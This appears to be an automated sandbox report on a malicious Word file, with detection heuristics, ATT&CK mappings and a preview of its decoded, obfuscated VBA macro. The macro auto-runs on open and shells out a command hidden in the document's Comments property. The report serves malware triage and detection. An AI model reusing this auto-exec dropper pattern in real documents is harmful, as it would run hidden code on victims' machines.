MALICIOUS
Risk Score: 232
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. It uses a "protected document" lure to prompt the user to enable editing and content, which is a common tactic for macro-based malware. The VBA script contains obfuscated strings and a call to PowerShell, indicating it likely downloads and executes a secondary payload. The ClamAV detection 'Doc.Macro.DollarShell-6346616-0' further supports its malicious nature.
Heuristics (9)

- ClamAV: Doc.Macro.DollarShell-6346616-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched lines in script:
  DwyMhLXs = "TYXuvMK" + "vSrrEnkDDDF" + "tzXUBNN" + "zPFYMgYFEvc" + "mhHYCrPpbW" + wvwvsUL = "UrKwHNf" + "axaBMaHheFX" + "tGmcvtE" + "bZAWTNykumP" + "FgcDCfC" + ngUBzzcMFb = "ANhRyhbuE" + "DCPSYAf" + "DsRDbfzLBf" + "FfZTLTPVW" + "YUcXMkea" + zaUAzxNF = "bPdsGZe" + "EvFVGcMTTaG" + "KSdwZYk" + "xnEZhBddhcZ" + "ydcCSBYFxBT" + "APSLcwVu"
  VBA.Shell$ "" + HgrrDtcWNfx + gUgyDafKR + LNtbaBDw + UZfPbzsbDuH + RYFaWrSEcf + DnKhHvRY + ActiveDocument.BuiltInDocumentProperties("Co" + "mments") + HgrrDtcWNfx + gUgyDafKR + LNtbaBDw + UZfPbzsbDuH + RYFaWrSEcf + DnKhHvRY + fRDSDGyTPw, 0
  ubccMXubgLW = "bgaWMgLTyh" + "AFKLkRBu" + "spTfMTXBF" + "mSzVLUNT" + "aPhBBKZEP" + hGZhMaUBaEs = "YnkMEdXk" + "GsnwdsSyRm" + "TgbdBekKgDu" + "RNrtNKD" + "DaFeFnAXWk" + udbAArvtK = "mGLPTxXdx" + "PPEKtDNg" + "FhNmWcAYw" + "AmemEXCSch" + "tfLSvBxRE" + yUFkUNPAh = "yeEZCMpU" + "pSzwcdaM" + "sWXvdtwFEGp" + "xBNvgydwHF" + "rUsdgDub" + "reRKEdU"
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script:
  Attribute VB_Name = "Module1"
  Sub autoopen()
  MAyZztedWNZ
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5044 bytes |

SHA-256: 14ee968f0c338c772ec1c142cb3b04564e8aedb2b5f176434471a3284da349ce

Detection (ClamAV): No threats found

Obfuscation or payload: likely. 284 of 348 identifiers look randomly generated (e.g. 'bZAWTNykumP') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub autoopen()
MAyZztedWNZ
End Sub
Function MAyZztedWNZ()
UaFLEzpwhD = "kvbyywXkce" + "haTsreBR" + "NrUUNSErRE" + "XDadvGBaLG" + "usgeZAmuD" + XdeCwVDFnRw = "chHnuZEr" + "umPpwMnG" + "yHAyAaag" + "yNvhThEkkS" + "wUKzLaaYBm" + "tRtGtLLcREe"
xsudpBYvaAF = "zZuBLhDh" + "gEswSfTRVX" + "RERdxXCmG" + "cZNfAGn" + "BGbTULYKe" + EXPcpRBShY = "FMkxmeFEv" + "sXWGfyPRhYp" + "fczegPskGK" + "eTfNasW" + "FguhnLRPRCb" + "MbdeZYbs"
MgEPKkT = "zNdYtBFeV" + "vbwTzmkvXbe" + "GFcRSFu" + "XGmescfz" + "rPvAAfb" + ELVntttzuL = "UXSyNGk" + "mNsYFWD" + "HGZSdsvKVyv" + "uNGZUCTfk" + "FAKMXbxyN" + "SHegYaCtX"
cmPcGvGXgrK = "pyhVrEWV" + "VkZVkgd" + "bMVAEzm" + "HaNRHxaWmG" + "XWRShyWU" + MTdfAunXZ = "BxdGbRyZ" + "fUSVAcS" + "vCAmZuAhfB" + "mSRvFNy" + "eCfXwWyVA" + LPVCApAReEs = "FFaUbFsBM" + "CyeUMTdm" + "DncHEKVtc" + "SzAWLCNvmT" + "rnDScfuZd" + HpHxrgTCLkw = "dtYyKYhTbDe" + "bMhRtsVY" + "XxsNnKfL" + "mtAnmwNWKBK" + "mntmENDdzNX" + "ednsctzafzr"
hyAzLDwH = "rhNRxanxpNG" + "DpAksCC" + "EgWuFFwLEX" + "eryMXstHcV" + "puXpdbcVu" + PMvFxgZad = "VSKLHZr" + "AZTubFcUd" + "FkPZENeFKYF" + "nVaFDVKgPX" + "RcYuLNVFv" + cZKKdyvd = "xhMTeape" + "cbSSDnxfvnK" + "gGRnuTfu" + "vVveHecXDyb" + "efZxwvvPzX" + ugughtB = "UwNAdKxYkfA" + "GDEULnAH" + "caxcVYAerFz" + "YNWkEPUAhZ" + "AAFnacx" + "zpSpUxv"
RzZwdmnKc = "exAgxGSHWTT" + "PuSLWgkC" + "YHgdeBhUhfD" + "FVnzwfcDX" + "zmNKfbWYVXx" + kMCvuxvWrc = "pBdByTEwW" + "pebdAMg" + "swUwWRKPHNx" + "bgppvbuE" + "gREEsuxa" + EmwpcDH = "sLZSkuAK" + "yUTPdpZF" + "EWbrNcdDnV" + "eaXgeFYUUg" + "kHfWaBfL" + "eSBrGVxPxW"
DVxKTXe = "CWMemRHCUX" + "bXxmfkZ" + "wbndRZuU" + "GHFDsWhuCK" + "HMZZcsF" + AnSHmgm = "GmygRbtrrDB" + "xBUvtYvmU" + "vYvgTNYy" + "bwRarAct" + "VfzyrPPGcE" + "HnDtvFSE"
DwyMhLXs = "TYXuvMK" + "vSrrEnkDDDF" + "tzXUBNN" + "zPFYMgYFEvc" + "mhHYCrPpbW" + wvwvsUL = "UrKwHNf" + "axaBMaHheFX" + "tGmcvtE" + "bZAWTNykumP" + "FgcDCfC" + ngUBzzcMFb = "ANhRyhbuE" + "DCPSYAf" + "DsRDbfzLBf" + "FfZTLTPVW" + "YUcXMkea" + zaUAzxNF = "bPdsGZe" + "EvFVGcMTTaG" + "KSdwZYk" + "xnEZhBddhcZ" + "ydcCSBYFxBT" + "APSLcwVu"
VBA.Shell$ "" + HgrrDtcWNfx + gUgyDafKR + LNtbaBDw + UZfPbzsbDuH + RYFaWrSEcf + DnKhHvRY + ActiveDocument.BuiltInDocumentProperties("Co" + "mments") + HgrrDtcWNfx + gUgyDafKR + LNtbaBDw + UZfPbzsbDuH + RYFaWrSEcf + DnKhHvRY + fRDSDGyTPw, 0
ubccMXubgLW = "bgaWMgLTyh" + "AFKLkRBu" + "spTfMTXBF" + "mSzVLUNT" + "aPhBBKZEP" + hGZhMaUBaEs = "YnkMEdXk" + "GsnwdsSyRm" + "TgbdBekKgDu" + "RNrtNKD" + "DaFeFnAXWk" + udbAArvtK = "mGLPTxXdx" + "PPEKtDNg" + "FhNmWcAYw" + "AmemEXCSch" + "tfLSvBxRE" + yUFkUNPAh = "yeEZCMpU" + "pSzwcdaM" + "sWXvdtwFEGp" + "xBNvgydwHF" + "rUsdgDub" + "reRKEdU"
PLCMhwUSALS = "UuNPgeVfgne" + "RhdRARX" + "wDtXPyUT" + "zRhLyUkwWG" + "matWuwkxtC" + uLcsXVaBe = "DtLWAgU" + "FepdUTUM" + "eztdnEfxaeF" + "HcxcEYz" + "BKcALcfWHNG" + EsvKLxGMVe = "UTkKkvbNL" + "mzVHfEe" + "hwMAZprLSF" + "zycceLx" + "YytFsKAYBdF" + fNZWRyBTRbx = "csbHfVUzUz" + "puZvkfkpa" + "HMWAAgsgRev" + "SGDYHhFgC" + "cemdXwrx" + "ZBYWVRwv"
UAVTzupWmBB = "xWPYxaAAa" + "Emdzxppdg" + "ZHbDkHuGAF" + "xnYKLyKL" + "FMxVZNTTGsv" + ebcCVUtfH = "MUgEEcWZe" + "tPmYdkVLmuF" + "EFRxndE" + "pUrFMXPFhV" + "AYVCPvtnGhD" + wBWbNeHEy = "KSkFxkN" + "LhWsYyYA" + "daTbuHuYsD" + "APhCVmgbRT" + "ceUxyWBPVXp" + PYafEnsNfM = "nfcwsHBgEZV" + "ebUcHdV" + "KLXsKvsbCt" + "sFMKxnkM" + "LKKLfpg" + "fGscyBd"
PwAGYrxu = "fNZxYDCg" + "buRpGuD" + "pWaGBfetgw" + "ZUMWVaCt" + "NfNXsHg" + sGcFaHfkWx = "yWWBrRVCNPz" + "NMmWPyZERX" + "YBSKZZcp" + "ShVZyTmKWuG" + "WSVSWMC" + sKYNrZRC = "tUBgTcy" + "CpvHwfbezu" + "mNEkzapyLb" + "FyeSuYfzkN" + "RpyZFEs" + "zMtaaGBfRyc"
ZnzacHMdeY = "xxTxYrb" + "RVesukUbgeD" + "TzUKeyMF" + "rWwfHwVtwHD" + "SKvemfxARbc" + RdFbDMVYPAG = "BtbRStVHVU" + "ApyWRka" + "KYTmpLRNBsL" + "UCWVphTzgZ" + "bbEmCtNzB" + bZeLNUf = "bWNyNXkkFGc" + "HLrZKrVX" + "gMfNkpSfGM" + "pmKHXazvA" + "RgvznLG" + "HcMzBDkhLb"
VDsTSWnDcAb = "yvYzdxAHB" + "cwwtkLgzmBP" + "xbxwGpbnDgy" + "WzFLSgbdA" + "fMsnEHyhwFr" + kRWmucS = "yaycrbaxU" + "wVNDWxGuyE" + "weUdKuttnP" + "YZWSpyvh" + "VvndaHLxnFg" + UuLCMVe = "XkTAVyPXfB" + "xCAFTseSWt" + "uSNmcfRmw" + "gddNnDN" + "tzdEVvn" + fUMGPbkAWXC = "PBLbDfkvGw" + "FrzMVgDU" + "nRuVkyP" + "eMvXnRSDukL" + "uTgsGzgTHkz" + "hWswCUn"
YSxUHCgyxk = "CakbWprB" + "nHSkCREEXg" + "YTsRKUWg" + "heuazHSuB" + "ytsgVTm" + XBAMUsb = "tabXwuavFG" + "GDKdfwchGPD" + "tDVtzfdUX" + "VbGsbEdmCkA" + "ZufcSxgbK" + NdNZXWBF = "mzuNNfXyYpm" + "PvMBTgF" + "vawHZspLC" + "yFLaypvPNUp" + "ydhDefF" + GYVphcLcUpY = "zvyppScTH" + "eBkcKUxdXFu" + "hErVNfrPt" + "CKyRkSk" + "DhmuLuZDra" + "xuzwfre"
GLCkcdu = "brUrrTHB" + "vLWmdsx" + "fNHKspEkUx" + "AUdCmCSG" + "NMURnvkTSf" + CRrGeFcW = "yEcLteCNZe" + "FTVxcZbPF" + "kSeUZXkNDw" + "YvGAkAVMNy" + "SMpSCNpuB" + "kDYgwMYE"
End Function